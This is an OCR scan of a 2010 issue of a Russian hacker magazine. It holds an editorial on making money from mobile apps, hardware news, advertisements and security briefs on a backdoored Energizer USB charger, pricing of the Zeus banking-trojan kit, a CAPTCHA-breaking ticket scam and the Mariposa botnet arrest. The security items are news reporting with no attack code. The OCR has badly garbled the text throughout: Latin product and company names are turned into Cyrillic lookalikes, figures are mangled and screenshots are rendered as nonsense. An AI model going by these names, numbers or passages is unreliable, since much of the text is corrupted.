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Загружено: 100 % вкуса, 100 % пользы 

Открыть еще один глазированный сырок "Зебра" 
после завершения загрузки 
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Я сыт : ) 




у срі± :) 



Взломай голод, пока он не взломал тебя! 

Ты ещё думаешь, как? 

Просто - с помощью глазированного сырка «Зебра»! 



Ищи на прилавках города! 










Осмотрись вокруг: сколько новых возможностей 
заработать! Бабло - куда ни глянь. Появление 
каждой новой мобильной платформы, каждой новой 
социальной сети - все это создает большие рынки 
для приложений, которые можно монетизировать 
прямо либо косвенно. 

К примеру, вот вышел і Раб. Через пару месяцев в 
мире будет уже явно больше 1 миллиона людей, 
обладающих этим девайсом. Но совершенно точно 
еще не все, даже лежащие на поверхности, идеи 
прикольных игр и приложений будут реализованы. 

А это - огромный рынок, куча денег. И, образно говоря, 
любой красиво прорисованный арканоид, который 



можно разработать за 2-3 недели, может тут принести 
десятки тысяч долларов. Тоже самое - с Ап б го і б, 
МАЕМО, іРЬопе, РасеЬоок/ВКонтакте и любой другой 
относительно молодой платформой, под которую 
можно создавать приложения. 

Чтобы не быть голословными, с этого номера мы 
решили делиться с тобой конкретными путями для 
заработка: на примере конкретных зиссезз зіогу 
наших авторов и наших читателей мы расскажем, как 
можно поднимать лаве в новыхусловиях. 

Приятного чтения! 
пікііон, гл. ред. X 
игіаіііе.ііѵеіоигпаі.сот 
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Мария «Мірріі_і_» Нефедова мАША.мЕРЕооѵдгабі-с.ріі 





ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



Зй ТОЛЬКО В КИНО? ТАК УЖ - ПРЯМО ДОМА! 

Сразу целым рядом новых мониторов решила порадовать нас компания І_Ѳ. В новые 
серии Е50 и Е40 войдут мониторы со светодиодной подсветкой (ЕЕИ), серия ѴѴбЗй 
являет собой продвинутые геймерские 30 модели, плюс появится целый ряд новых 
ЖК мониторов с усовершенствованными функциями. 

Остановимся подробнее на сериях Е50 и Е40. Модели этих серий отличаются уль- 
тратонким корпусом, всего 1 7.5 мм, что на треть тоньше большинства мониторов с 
флуоресцентной подсветкой (СОРЕ). Также светодиодная подсветка помогает снизить 
энергопотребление на 45% по сравнению с обычными мониторами. Время отклика 
для моделей обеих линеексоставляетб мс, яркость250 кд/т2, а уровеньдинамичес- 
кой контрастности 5 000 000:1 . Серия Е50 также обладает набором интеллектуальных 
функций 5тагі:+: АіЛо ВгідЫ:, ОиаІѴѴеЬ, Сіпета Мобе и Огідіпаі РаЕіо, и оснащается 
«умными» подставками Тѵѵо-ѵѵау Зіапб, которые легко трансформируются в стойку, 
поддерживающую монитор подобно фоторамке. Также стоит отметить, что модель 
ЕС Е2350Ѵ (старшая серии Е50] — это первый монитор, получивший экологический 
сертификат5из1:аіпаЫ.е Ргобисі: Сегббсабоп отЕІЕ ЕпѵігоптепЕ института, который 
осуществляет независимую оценку заявлений об экологичности. 




В КЕМБРИДЖЕ ВЫЯСНИЛИ. НТО СЕКРЕТНЫЕ ВОПРОСЫ. ИСПОЛЬЗУЕМЫЕ ДЛЯ 
ВОССТАНОВЛЕНИЯ ПАРОЛЕЙ. ЗАЧАСТУЮ УПРОЩАЮТ ВЗЛОМ - С ИХ ПОМОЩЬЮ 
МОЖНО ВСКРЫТЬ КАЖДЫЙ 80-ЫЙ АККАУНТ. 



ТРОЯН С ПОДЗАРЯДКОЙ ГОРОД ХЗ 




Пожалуй, после прочтения этой новости ты сможешь со всей ответс- 
твенности заявить, что дожил до самого настоящего киберпанка «здесь 
и сейчас». Западная ИТ-группа 115-СЕПТ обнаружила в безобидном на 
первый взгляд 115 В -за ряд нике ЕпегдігегОІІО, предназначенном для АА 
и ААА батареек, самый настоящий трой. Зараза крылась в софте, позво- 
ляющем наблюдать за уровнем заряда батареи. Именно вместе с этой 
софтиной на машинуустанавливается бэкдор, который Е5ЕТ определяет 
как вредоносную программу ѴѴіп32/Аги гігег.А. Он открывает для входящих 
подключений 7777-й порт, позволяя гипотетическому злоумышленнику 
скачивать и запускать исполняемые файлы на зараженном ПК, удалять 
файлы, и получать от«больной» системы инфу. При этом никаких исходя- 
щих соединений не производится, а все модули троя удаляются во время 
деинсталляции программы. Епегдігегуже выпустил заявление, согласно 
которому, продажи устройств ЕпегдігегОІЮ были приостановлены, и про- 
водится расследование, призванное выявить, кактроян вообще попал 
в зарядники. При этом с сайта разработчиков можно было скачать точно 
та кую же версию программы с интегрированнымтроем. В последней вер- 
сии Меіазріоіі: есть модули епегдІ 2 ег_био_рауІоаб епегдІ 2 ег_бію_беі:есЕ с 
помощью которого можно протестировать все хосты в заданном диапазо- 
не на наличиетроя и использовать его функционал. 



Поражающее воображение 
мультимедийное шоу было 
представлено 1 0 марта в галерее 
«Ателье №2» на ВИНЗАВОДе, 
в центре нового мегаполиса 
ѴѴіпзІюпХЗ. Инсталляция, 
изобилующая зеркалами, светом 
и цветами была создана извест- 
ным художником и продюсером 
Павлом Каплевичем совместно с 
ѴѴіпзІюпХЗ. В проекте «ГородХЗ» 
соединилисьдва явления: совре- 
менный мегаполис и оптическое 
искусство (иначе — оп-арт). Фан- 
тазия Каплевича подарила новый 
смысл и новую жизнь революци- 
онным открытиям оп-арта. 
Окунуться в ритм «Города Х5» 
втечение марта моглюбой 
желающий. 



► 004 



ХАКЕР 05 /136/ 10 






Небольшой размер. Большие возможности. 



Печать с экрана одним 
нажатием кнопки «РгіпіЗсгееп» 







БЫСТРО. УДОБНО. КОМПАКТНО. 

Затзипд МЫ 660/1 665 -один из самых миниатюрных черно-белых 
принтеров в мире. Небольшой размер, стильный дизайн и высокая 
скорость печати делают его оптимальным решением для дома. 

К тому же, теперь Вы сможете легко распечатывать любую инфор- 
мацию с экрана монитора одним нажатием кнопки РгіпІЗсгееп. 

8ЛМ81ЛЧС 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 

ѵѵѵѵѵѵ.затзипд.сот. Товар сертифицирован. Реклама. ТІІРИ ОЫ ТОМОРРОѴГ 



* Навстречу будущему. 



МЕ6АЫЕѴѴ5 



НЕ ВСЕ ДРОВА ОДИНАКОВО ПОЛЕЗНЫ 




В начале марта компания ІМѴісІіа выпустила 
предупреждение отом, что использование 
ѴѴНСІІ_ драйверов версии 1 96.75 опасно и может 
даже окончиться «смертью» видеокарты. Ксо- 
жалению, эти данные уже подтверждены людь- 
ми, которыеуспели обновиться до злосчастной 
версии и, в итоге, поплатились проблемами 
охлаждением, во многихслучаях приведши- 
ми кфатальным последствиям. Упомянутые 
драйвера действительно приводят к неполад- 
кам в работе системы охлаждения — во время 
выполнения ЗО-игр кулер видюхи замедляется, 



либо останавливается вовсе, в результате 
температура ОРІ) могла превышать 100°С. В 
результате — перегрев, зависания и перезаг- 
рузки, а в худшем случае даже выход карты 
из строя. Производитель уже удалил опасные 
драйвера с сайта и настоятельно рекомендует 
пользователям, вернуться кверсии 196.21 , а 
196.75, до исправления неполадки, обходить 
десятой дорогой. Удалить косячный драйвер из 
системы, если ты успел его установить можно с 
помощью утилиты 0гіѵег5\л/еерег(ѵѵѵѵѵѵ.дигиЗсІ. 
со т/са 1: е д о гу/сі гі ѵе гзѵѵе е р е г] . 



ФИНСКАЯ КОМПАНИИ ЗЕСІМІА ПОДСЧИТАЛА, ЧТО ОБЫЧНЫЙ №1И00№3-ЮЗЕР В 
СРЕДНЕМ УСТАНАВЛИВАЕТ НА СВОЮ ОСЬ НОВЫЙ ПАТЧ РАЗ В 5 ДНЕЙ. 



ИЩУ АКТИВАТОР ДЛЯ ѴШНШ7-ТР0Я 



Создатель или создатели инструментария 
для разработки и поддержания ботнетов на 
базе известного трояна 2еи5 жгут напал- 
мом. Нет, конечно, такого рода софт всег- 
да продавался за немалые деньги и был 
далеко непрост, но авторы ХеііЗ решили 
существенно «расширить горизонты». Им, 
очевидно, было мало того, что с недавних 
пор 2еи5 выпускается в разных вариациях, 
обеспечивающих самый разносторонний 
функционал и сильно отличающихся по 
стоимости. Тут все как с приобретением 
автомобиля. Базовая комплектация 2е из 
КТ версии 1 ,3.4.x стоит от 3 до 4 тысяч 
долларов (старье, которое можно найти 
даже бесплатно, в расчет не берем], но 
дальше можно установить опции. Модуль 
для Васксоппесі; стоит $1500, форм-граббер 
для Рігеіюх’а — еще $2000, онлайн лог об 
украденных данных посредствам ЗаЬЬег’а — 



$500, поддержка Ѵізіа/ѴѴіпсІоѵѵз 7 — $2000. 
Часть опций продается приватно, напри- 
мер возможность доступа к удаленному 
рабочему столу через ѴІ\ІС стоит сразу 
$10000. Но это еще не все. 

Теперь инструментарий, как настоящее 
серьезное ПО, обзавелся еще и системой 
активации, привязанной к аппаратной 
части машины. В целом эта система похо- 
жа на активацию МісгозоіТ ѴѴі псіоѵѵз, то 
есть, зарегистрированный билдер можно 
запускать только на одном, конкретном ПК. 
Эксперты всего мира лишь разводят рука- 
ми и в один голос сообщают, что с таким 
уровнем «лицензирования» малвари они 
сталкиваются впервые. Кроме того, допод- 
линно известно, что автор(ы] 2еи5 уже во 
всю работают над новой версией трояна 
— 1.4. В новой версии обещают веб-инжек- 
ции в Рігеіюх’е (динамическая подстановка 






нужного злоумышленникам НТМБ-контента), 
а также полиморфное шифрование. 
Последнее означает, что ХеиЗ-троян будет 
криптовать свое тело каждый раз при зара- 
жении жертвы, поэтому тело вируса будет 
уникально на каждой машине. Антивирусы 
и сейчас детектят ХиеЗ через раз, а уж 
полиморфное шифрование ситуацию явно 
не улучшит. 



КИНОМАНАМ И НЕ ТОЛЬКО 




Сегодня у многих людей компьютер играет 
рольдомашнего медиацентра или кинотеатра. 
Именно для таких пользователей тайваньская 
компания М5І и создала системную плату 
8906ХМ-С65, на базе которой как раз предла- 
гается создаватьдомашние кинотеатры. Плата 
построена на наборе системной логики АМБ 
890СХ + 5В850, и кее отличительным особен- 
ностям можно отнести совместимость с новыми 
процами АМБ РЬепот II, атакже встроенный 
графический процессор АТІ Пабеоп НБ 4290 с 



поддержкой БігесіХ 10.1 и ІІѴБ 2.0 и выходами 
БѴІ и НБМІ. Также плата оснащена интерфейса- 
ми 5АТА6 Гбит/с и БЗВ 3.0. Выполнена 890ВХМ- 
065 в формате тісго АТХ и имеет два слота 
расширения РСІ Ехргеззхіб, один РСІ Ехргезз 
хі и один РСІ. Для оперативной памяти отведе- 
но четыре слота, которые смогут «прожевать» до 
16 ГБ БОРЗ 800, 1066, 1333, 1600, 1800 или 2133 
ГГц. Плата поддерживаеттехнологии СгоззЕіге 
и НуЬгісІ СгоззЕіге, и благодаря технологии ОС 
Сепіе хорошо поддается разгону. 



СОГЛАСНО ПОДСЧЕТАМ ГАЗЕТЫ «КОММЕРСАНТ». МЕСЯЧНАЯ АУДИТОРИЯ 
К0ШСКЕК.0К6 (ЭКС ТОККЕИТЗ.ІШ). СОСТАВЛЯЕТ 5,6 МЛН ЧЕЛОВЕК. 
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Корпорация іпіеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений 
относительно конкретных компьютерных систем, упоминание о которых содержится в данной рекламе. 

Корпорация Іпші ©201 От, Все права защищены. Іпгеі, логотип Іпгеі, Іпгеі Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 

‘Другие наименования и товарные знаки являются собственностью своих звко иных владельцев 
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Мобильные приложения были всегда. Еще с 
появления 52МЕ мы устанавливали всевозможные 
приложения на свои сотовые, пытаясь совладать 
со спецификой телефона. Сейчас даже продавцы 
из овощного магазина сидят через Л тип в аське — 
вотона забавная российская специфика. Во всем 
же мире настоящий переворот совершила Арріе, 
которой под силу оказалосьто, что долгое время не 
удавалось другим — сделать мобильные приложе- 
ния самым обычным делом не только для гиков, но 
и самых обычных людей. Создание АррЭіоге, где 
приложение установить и купить не сложнее, чем 
совершить звонок, стало настоящей революцией. 
Только вдумайся: в магазине сейчас доступно бо- 
лее 170тысяч приложений, а еще в июне прошлого 
года их было только 50 тысяч. Причем это только те 
приложения, который прошли тщательную провер- 
ку самой Арріе. Но мобильные приложения — это 
отнюдь не только пресловутый іРЬопе, который в 
России продают за бешенные деньги. 

На подъеме и другие платформы. Несмотря на 
то, что в арсенале Ап б гоісі еще только 30 тысяч 
приложений для мобильной платформы от Соодіе, 
действительно стоящих продуктов еще мало. В 
одной из статей номера мы приводим опыт одного 
из начинающих разработчиков, который не по- 
боялся попробовать свои силы и получил вполне 
ощутимую прибыль. К чему это все? Да потому что 
это твой шанс, свободная ниша, которую вот-вот 
займут. Если раньше компании, сосредоточен- 
ные исключительно для работы над мобильными 
программа и играми, были редкостью, то сейчас 
среди стартапов — чуть ли не самое часто явление. 
Данные из графиков — тому в подтверждение. 



ЧИПСЫ НА ФЕРМЕ 



Скорее всего, даже среди наших читателей найдутся люди, которые посредством 
приложения «Счастливый фермер» ведут ВКонтакте свое виртуальное хозяйство (не 
переживай, мы никому не скажем :)). Это простая математика, ведь«Фермером»уже 
увлеклись 7996 млн человек— на сегодня это самое популярное он-лайн приложение в 
Рунете. И вот на примере этого сверхуспешного таймкиллера компанией СобеоІТгасІе 
Оідііаіи компанией Сатеіапб был успешно реализован проектвнедрения в игру брен- 
да Еауз. Игрокам предложили новую функцию, с помощью которой пользователь может 
производить собственные чипсы — юзерам выдали бесплатные семена картофеля, 
ингредиенты для производства чипсов, а также дали возможность установить на своей 
ферме завод по производству чипсов Еауз. Такая реклама, в отличие от раздражающих 
баннеров и спама, пришласьлюдям подуше — за два месяца суммарно было произве- 
дено 400.656.889 пачекчипсов! Экспериментопределенноудался. 



О контакте 



Мм Страниц* ред. 



МинПлипинс№н * Счастливый Фермер - игра для тебя нт 



мои ЛИ** 

МонФотнрафт 

мри ^цкеигмен 

МонАуДИВД№01 

мм сн&цеиий 
Мои ЗвеЧ'ТКИ 
МОчГрулц* 
Мом&гречі 

Мои Новости 
НоиВветрсмот 
Приложения (3) 

ОбЪЯБПЛЫД 



Мон Приложения | Убрать щмпожем-іе с гай страницы [ Пригласить друзей | НастроіѴи 




Новая гар-а Тншеіпѵ Хйвдш - Сантык популярный □ мира покер теперь дйй вас Бконтанта 

Для правильной рабаіы пркпаікнтнин непСкадим ГІчіЬ плеер версии ІО. Обновить ІДЙСЬ 

А ДОйРТЫк монеты = 1 ГОЛОС 
подробнее в лічном капнете (ПС) 

Едітііч тех. поддержка | Часто аадавааные вопросы | ОфициагьтЛ форул 
Постоянная ссылка на игру: Ы;1р://Іл(ниг .Ѵкогйайе.пи 



Груягѵкі-ІеЕ | Пожадоватьсй 



ОРГІСЕ 2010 БУДЕТ ДОСТУПЕН В БИЗНЕС 
ВЕРСИИ С 1 2 МАЯ. А ВЫХОД ОБЫЧНОЙ ВЕРСИИ 
НАМЕЧАЕТСЯ НА ИЮЛЬ. 



ЦЕЛАЯ ПАЧКА ИНТЕРЕСНОГО ЧТИВА 



В сети всегда можно найти, что почитать — милли- 
оны электронных книг, подборки учебной и научной 
литературы, огромное количество сайтов-библиотек, 
архивы комиксов, наконец... Но совсем недавно в инете 
стало еще одним интересным архивом больше, и мы 
считаем, что он достоин отдельного упоминания. Ста- 
рое, уважаемое и в некотором роде культовое издание 



«Популярная наука» (Рориіаг Зсіепсе] выложило на 
своем сайте, в совершенно открытом и бесплатном 
доступе архив журналов на 137 лет! Найти весь этот 
пир духа, отсканированный проектом Соодіе Воокз, 
можно по адрес ѵѵѵѵѵѵѵ.рорзсі.сопп/агсіііѵез . Для чтения, 
разумеется, потребуются знание английского языка и 
любовькзнаниям. 




Р0Р5СІ© 



ЙШО СШС ИЧЖСІ ТШ№№1 ОГЛ 
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ДА КОМУ НУЖНЫ ЭТИ НОУТБУКИ! 



Кардинальное решение представила на суд пользователей компания 
ТЬегтаІіаке, выпустив тісНоѵѵег корпус Ѵ5 Віаск Есііііоп с ручкой и 
колесиками для транспортировки. В самом деле, зачем нужны все эти 
ноутбуки? Взял системники пошел в гости, воттебе и полезные физичес- 
кие нагрузки (корпус весит7,1 кги имеет размеры 508x223x490 мм] и 100% 
репутация абсолютного гика. Шутки шутками, а «кузов» действительно 
хорош, внутри скрываются: девять мест под накопители типоразмеров 
5.25», 3.5» и 2.5», судобной съемной корзиной; блокпитания, защищен- 
ный отпыли специальным фильтром и расположенный внизу корпуса; на 
переднюю панель вынесены порт еСАТА, два порта ІЧ5В 2.0 и фронталь- 
ные аудиоразъемы. Вентиляции тоже в достатке — два 120-мм на задней 
стенке, 200-мм вентилятор с синей подсветкой на верхней панели, атакже 
есть возможность установить 120-мм вентиляторы для обдува видеокарты 
и жестких дисков. Рекомендованная цена корпуса составит$69. 

И ВАШИМ И НАШИМ 

В деле кардера Альберта Гонсале- 
са, осуществившего крупнейшую в 
истории США кражу номеров кре- 
дитных карт, произошел довольно 
неожиданный поворот. Напомним, 
что Гонсалесу предъявлены 19 
обвинений, и он полностью признал 
свою винуеще в конце прошло года. 
Теперь его ждет суд, тюремный срок 
от 15 до 25 лет, а также штраф размером почти 3 млн долларов и конфискация 
имущества. Но недавно друг и сообщник главного кардера всея Штатов Стив 
Ватт (ЗіерНеп ѴѴаи) сообщил миру, что все это время Гонсалес работал на амери- 
канское правительство, аименнона Секретную службу США. По словам Ватта, 
Гонсалесу платили $75 тыс. наличными в год за предоставление информации о 
других кардерах. Что характерно, Секретная служба отказывается комментиро- 
вать этот вопрос. Видимо промышлять одним только кардингом, Гонсалесу было 
скучно. 

бООбЬЕ ПОКИДАЕТ КИТАЙ 

Громкий скандал, похоже, получитне менее громкое продолжение. Напом- 
ним, что в конце прошлого года ряд крупных компаний, в число которых 
входила и Ооодіе, подвергся атаке со стороны неизвестных хакеров. 
Впрочем, представители поискового гиганта почти сразузаявили, что по 
их данным взлом был заказной, и следы его ведут в Китай. Конечно, Китай 
такомузаявлению не обрадовался и, в итоге, дошло до того, что боодіе 
вообще пригрозил китайским властям, свернуть свою деятельность в 
Поднебесной. Дело втом, что в связи с декабрьским хаком в обсуждениях 
выплыли и старые, не менее неприятныетемы, в частности — цензура, 
которая действовала на Соодіе. сп по просьбе властей. В итоге, после дол- 
гих переговоров, всезакончилосьдовольно предсказуемо: в конце марта, 
несмотря на предупреждения властей Китая, боодіе все же прекратил 
цензурировать результаты поиска, и с доодіе.сп появился редирект на 

доодІе.сот.Гік, работающий без 
фильтрации. СМИ поднебесной 
тутже поспешили обвинить 
поисковик в связях с разведкой 
США. Похоже, что все действи- 
тельно идет к закрытию предста- 
вительства Соодіе на территории 
Китая, так как переговоры с 
властями явнозашли втупик. 




КАДРОВЫЕ ПЕРЕМЕНЫ 

Тим Брэй, известнейший канадский П0-разработчик, соучредитель 
компаний Ореп Техі Согрогаііоп и Апіагсбса Сузіеппз, соавтор языка 
ХМІ_, покинул корпорацию 5ип МісгозузШтз, где до недавнего времени 
занимал пост директора по веб-технологиям. Справедливости ради 
отметим, что представители Огасіе, в руки которой вот-вот перейдет 
Сип, предлагали Тиму остаться, но он не захотел. Новым место работы 
Брэйя станет команда разработчиков Соодіе АпбгоісІ, о чем он поведал в 
своем блоге, подзаголовком «Теперь я на территории, где нетзла» (ІМоѵѵ 
А І\Іо-Еѵі12опе]. Все в том же блоге Тим рассказал о том, что он разделяет 
философию Соодіе, поддерживает их в борьбе против Арріе іРГіопе и ему 
очень импонирует открытость платформы АпбгоісІ и дух ореп-зоигсе. По 
словам Брэйя : «Будущее мобильного Интернета с ІРГіопе не включает в 
себя споры, полемику, секс и свободу, зато четко регламентирует, кому 
что разрешено знать и делать. Этакий стерильный диснеевский садик, 
окруженный со всех сторон высокой стеной и зубастыми адвокатами. 
Люди, которые создают приложения, служат Хозяину и боятся его гнева. 
Мне это отвратительно». Что ж, надеемся, энтузиазм Тима не пропадет 
даром и скажется на АпбгоісІ самым лучшим образом. 
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МЕ6АЫЕѴѴ5 



МИЛЛИОНЫ НА ВЗЛОМЕ САРТСНА 



Казалось бы, как мож- 
но заработать $25 млн 
на взломе САРТСНА? 
Чуваки, которых 
сейчас судят в Нью- 
Джерси, доказали, 
что та кое более чем 
возможно. Схема их 
работы была проста: 
они перекупали на 
онлайновых распро- 
дажах билеты на кон- 
церты, спортивные 
состязания итакдалее — в числе пострадавших Тіскеітазіег, Міізісіосіау 
и Тіскеіз.сот. Чтобы имитировать покупки отлица частных граждан, 
предприимчивые ребята плотно пообщалисьсбывшими сотрудниками 
компаний распространителей билетов, зарегистрировали две фирмы, 
купили диапазоны ІР-адресов и сняли в аренду сервера. Но, какуже было 
сказано ранее, все основное действо строилось на взломе визуальных и 
звуковых САРТСНА, которые использовали сайты онлайновой продажи 
билетов (также они отслеживают ІР-адреса, телефоны итакдалее). Боты 
имитировали даже задержку: от 5 до 10 секунд для визуальных капчтей, и 



30 на звуковые. Прибегнув кпомощи опытных программеров и вложив не- 
малые деньги в разработку, мошенники сумели создать ботов, которые как 
орешки щелкали даже геСАРТСНА и аккуратно заполняли все поля анкет 
фейковыми адресами, телефонами и мейлами. Всеэти данныедля этого 
мошенникам предоставляли брокеры, делавшие заказы нате или иные 
билеты. Боты порой даже ошибались при наборе сарісба, для вида якобы 
делая опечатки, что позволяло им лучше походить на людей. Итогэтой 
масштабной аферы поражает — за периодс2002 по2009 год группировка 
умудрилась заработать на перепродаже билетов более $25 млн! Сгубили 
же спекулянтов жадность и безнаказанность, например, в последние годы 
они в открытую искали в сети опытных специалистов по взлому САРТСНА. 
До этого до нихтрудились программисты из Болгарии. Особенно в данной 
истории интересното, как им удалось взломать сервис геСАРТСНА, предо- 
ставляющий любым компаниям весьма надежную капчу. По всей видимос- 
ти, капча не генерируется каждый раз заново — естьограниченное, хотя и 
очень большое количество образцов. Если посмотреть на ссылку картинки, 
легко читается структура: Нир5://арі-зесиге.гесарІсЬа.пеі/іітіаде?с«<Ю 
картинки>. Авторам аферы удалось собрать ошеломляюще огромную базу 
Ю и правильных ответов для САРТСНА, который распознавались вручную. 
В обвинении не фигурирует ботнет и вирусы, собирающие такиеданные, 
поэтому распознавание, похоже, проводили обычныелюди — какобычно 
$1-2за 1000 распознанных капч). 




70 % УТЕЧЕК ИНФОРМАЦИИ ПРОИСХОДИТ ПО ВИНЕ СОБСТВЕННЫХ 
СОТРУДНИКОВ КОМПАНИИ. 



Уже несколько летживучий браузер ІпІегпеІ Ехріогег 6 пытаются вытеснитьс рынка, 
но никак не желаетумирать. Если верить статистике ѵѵѵѵѵѵ.ІіѵеіпІегпеЕги, то в Рунете им 
по-прежнему пользуются 8.8% — но для сравнения у Орега Міпі для мобильных телефо- 
нов всего на один процент меньше. Эта холодная война между разработчиками и брау- 
зером тянулась и тянулась, до тех пор, пока против «шестерки» неуговорилисьдружить 
сразу ряд крупных компаний, в число которых вошли Соодіе (посредством ѴоиТиЬе), 
ЕасеЬоок, МоЬіІеМе и многиедругие. В начале марта Соодіе и множество других 
компаний официально прекратили поддержку ІЕ6, сняв со своих плеч этоттяжкий груз. 
Компания Аіеп Оезідп Сгоир и вовсе устроила браузеру пышные похороны, о которых 
каким-то образом прознали в МісгозоЕ, и из штаба софтверного гиганта прислали 
букет цветов (жаль не венок) сзапиской. В записке говорилось: «Спасибо за все ІЕ6, до 
встречи на МІХ, где мы покажем кусочек рая для Іпіегпеі Ехріогег’ов. Команда Іпіегпеі 
Ехріогегй МісгозоЕ». Что ж, аминь. 

ПРЕМИЯ ТЬЮРИНГА НАШЛА ЕЩЕ ОДНОГО ЛАУРЕАТА 

Ежегодная премия Тьюринга вручается компьютерным ученым и инженерам 
уже давно — с 1966 года, и удостаиваются еелишьте, кто добился больших 
успехов в расширении границ информатики. Своим именем награда обязана 
английскому математику, пионеру компьютерных наук Алану Тьюрингу. На 
этот раз Ассоциация вычислительной техники (АззосіабопІогСотрибпд 
МасЫпегу, АСМ] удостоила наградой и чеком на $250тыс. Чарльза Такера, как 
одного из изобретателей ПК, подключенного ксети. В середине 70-х Такер 
работал в Пало-Альто, в исследовательском центре корпорации Хегох, где под 
его руководством был создан прототип настольного компьютера АКо. Прототип 
нес в себетакие революционные натотмомент решения, какэкран, анало- 
гичныйтелевизионному, ГУМ итекстовый редактор ѴѴУ5ІѴѴУС. Помимо АИю, 

Такертакже внес огромный вклад в развитие ЕібегпеЕ работал над созданием 
прототипов первых многопроцессорных рабочих станций и даже первых план- 
шетных ПК. На сегодняшний день Чарльз трудится в компании Місгозоіі 




РЕКВИЕМ ПО ІЕ6 
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Код. Он есть во всем, что нас окружает. Он всюду, куда бы ты 
ни посмотрел. Он таит в себе неограниченные возможности. 
Используя их, ѴІБиаІ Біисііо 2010 поможет реализовать любые 
идеи с помощью новых инструментов, которые перевернут 
твое представление об эффективной работе, начиная 
с дизайна и разработки и заканчивая запуском проекта. 



МИР КОДА В ТВОИХ РУКАХ. 

А НА ЧТО СПОСОБЕН ТЫ С ѴІ$ІІАІ_ 5ТІГОІО 2010? 



ш 




Узнай бо. 


! 11 






_ , , ~ Щ Сфотографируй этот знак и получи последние новости о ѴізиаІ Біисііо. 

Ф Р Ф РУ 9 Загрузи бесплатное приложение для своего мобильного на ННр://деНад.тоЫ. 

© 2010 МісгозоП Согрогаііоп. Все права защищены. Владельцем товарных знаков МісгозоП, ѴізиаІ Біисііо 2010, зарегистрированных на территории США и/или других стран, и владельцем 
авторских прав на их дизайн является корпорация МісгозоП. Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками 
соответствующих владельцев. 

Реклама. 



МЕ6АЫЕѴѴ5 



ОПЕРАЦИЯ 
СПАСЕНИЮ МѴЗІІІ. 

Нетакдавно мы писали отом, что «отец» Му50І_ Майкл «Мопіу» 
Ведениус выступал против покупки Зип Місгозузіетз компанией 
Огасіе, опасаясь за судьбу своего детища после этого слияния. Когда у 
Веденисуса не получилось помешать сделке, он обратился за помощью 
кдвум «сильным, самостоятельным странам, которые поддерживают 
движение ореп зоигсе» — России и Китаю. Как ни странно, наши власти 
судьбой СУБД действительно заинтересовались и решили поучаство- 
вать в спасении «Мускула». Федеральная антимонопольная служба 
(ФАС) выдвинула компании Огасіе условия, согласно которым послед- 
ние будутобязаны после слияния совершенствовать и поддерживать 
Му5СН_ в рамках общедоступной лицензии, не навязывая при этом 
услуги собственной техподдержки и не совершая иных «криминальных» 
деяний. Все это, конечно, весьма позитивно, но проблема в том, что 
Огасіе, в случае чего, врядли приметусловия ФАС в расчет — российс- 
кий рынок слишком незначителен, чтобы ФАС могла реально вос- 
препятствовать сделке гигантов, или на них повлиять. Врядли угроза 
привлечения кадминистративной ответственности будет воспринята в 
Огасіе всерьез. 



ПО ДАННЫМ КОМПАНИИ ЯНДЕКС, 
ЧИСЛО РУССКОЯЗЫЧНЫХ твиттян 
ЗА ЗИМУ ВЫРОСЛО НА 42 %. 



М0Н0БЛ0Ч 
ЗВУК ОТ АЗ 



ЫЙ 

3 



Компания Азизе гордостью представила новинку в серии звуковых систем 
которую, ктомуже, называет самой компактной пятиканальной акустичес- 
кой системой в мире. Фишка втом, что вся пятиканальность разместилась, 
таксказать, в одном флаконе — А51І5 Сіпеб представляет собой аудио- 
моноблокразмером 373x100x80 мм или 373x100x100 мм, взависимости от 
того резиновая или металлическая подставка используется (обе входят в 
комплект]. Технические характеристики новинки таковы: максимальная 
мощность системы равна 28 Вт (РМ5 1 5 Вт], диапазон воспроизводимых 
частот простирается от 80 Гцдо20 кГц. Имеются уАЗІІЗ Сіпеб и гнездо для 
подключения наушников и входы диаметром 3.5 мм. Для подключения 
к источнику многоканального звука (5.1] в комплект входит а налоговый 
кабель. Главной фишкой и удобством девайса, пожалуй, можно называть 
возможность формирования пятиканального звука из простого стереофо- 





ГРОМКИЙ АРЕСТ 
Б0Т0В0Д0В В ИСПАНИИ 

Жирную галочку в своих отчетных 
документах смогут поставить 
испанские борцы с киберпре- 
ступностью, ведь им совместно 
с ФБР СШАудалось задержать 
сразутроих хакеров, причастных 
ксозданию огромного ботнета 
Магіроза (по-испански «бабоч- 
ка»], насчитывающему почти 13 млн компьютеров в 190 странах мира. Ко- 
личество зараженных хостов удалось посчитать, когда удалось изменить 
БЫЗ-записи, чтобы боты не могли коннектиться ксвоим управляющим 
серверам. О размахах ботнета говорит и тот факт, что в Испании оператор 
Ѵобаіопе продал 3000 свеженьких смартфонов НТО Мадіс, зараженных 
зловредным кодом, связанным с ботнетом Магіроза. Помимо обычных 
пользовательских машин, ботнет сумел распространиться на компьюте- 
ры компаний, входящих в список Рогіипе 1000 — топ крупнейших корпо- 
раций мира. Известно, что все трое задержанных — граждане Испании, 
которые называют себя ББРТеат. Владельцев ботнета ловили долго. 
Для известного снифера ѴѴігезбагк даже был разработан специальный 
плагин (ѵѵ\л/ѵѵ.раІоаІІопеІѵѵогк5.сопп/ге5еагсЬсепІег/2009/10/тагіро5а- 
Іооі], позволяющий на лету дешифро вывать трафик между ботами и С&С 
сервером. Помогслучай: один из хакеров — Ыеікаіго, однажды обратился 
к админке с отключенным ѴРІЧ -соединением и спалил свой настоящий 
ІР. До этого момента все попытки вычислить владельцев ботнета были 
бессильны. Благодаря проведенной операции ботнет Магіроза свое су- 
ществование прекратил, но миллионы зараженных машин по-прежнему 
ломятся на отключённый С&С (сотапсі&сопігоі] сервер. 

ПО ДАННЫМ ѴѴІМАХ РОКОМ, ДОСТУПОМ 
К ѴѴІМАХ СЕТЯМ УЖЕ СЕГОДНЯ МОГУТ 
ВОСПОЛЬЗОВАТЬСЯ БОЛЕЕ 620 МЛН 
ЧЕЛОВЕК, А К 2011 Г0ДУЭТА ЦИФРА 
ДОСТИГНЕТ 1 МЛРД. 
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Проекторы 




Компания МЕС Эізріау Зоіиііопз является одним из ведущих 
мировых производителей, предлагающим широкий спектр 
инновационных продуктов и решений по визуализации 
информации: офисные, профессиональные и 
специализированные настольные ЖК-мониторы; 
широкоформатные ЖК-дисплеи для общественных мест; 
проекторы для различных сфер применения - 
от портативных моделей для презентаций до цифровых 
кинопроекторов. 



